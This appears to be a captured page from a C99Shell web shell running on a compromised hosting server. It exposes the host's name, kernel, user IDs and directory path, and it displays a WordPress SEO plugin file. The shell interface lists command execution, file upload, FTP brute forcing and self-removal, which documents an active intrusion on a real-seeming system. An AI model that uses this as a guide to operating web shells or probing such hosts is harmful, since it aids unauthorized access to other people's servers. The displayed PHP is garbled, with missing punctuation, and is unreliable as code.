!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/   drwxr-xr-x
Free 180.01 GB of 490.84 GB (36.67%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-recalculate-scores.php (1.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin
 */

/**
 * Class WPSEO_Recalculate_Scores
 *
 * This class handles the SEO score recalculation for all posts with a filled focus keyword
 */
class WPSEO_Recalculate_Scores {

    
/**
     * Constructing the object by modalbox, the localization and the totals.
     */
    
public function __construct() {
        
add_action'admin_enqueue_scripts', array( $this'recalculate_assets' ) );
        
add_action'admin_footer', array( $this'modal_box' ), 20 );
    }

    
/**
     * Run the localize script.
     */
    
public function recalculate_assets() {
        
$asset_manager = new WPSEO_Admin_Asset_Manager();
        
$asset_manager->enqueue_script'recalculate' );
    }

    
/**
     * Initialize the modal box to be displayed when needed.
     */
    
public function modal_box() {
        
// Adding the thickbox.
        
add_thickbox();

        
$progress sprintf(
            
/* translators: 1: expands to a <span> containing the number of posts recalculated. 2: expands to a <strong> containing the total number of posts. */
            
__'%1$s of %2$s done.''wordpress-seo' ),
            
'<span id="wpseo_count">0</span>',
            
'<strong id="wpseo_count_total">0</strong>'
        
);

        
?>
        <div id="wpseo_recalculate" class="hidden">
            <p><?php esc_html_e'Recalculating SEO scores for all pieces of content with a focus keyword.''wordpress-seo' ); ?></p>

            <div id="wpseo_progressbar"></div>
            <p><?php echo $progress?></p>
        </div>
        <?php
    
}
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0066 ]--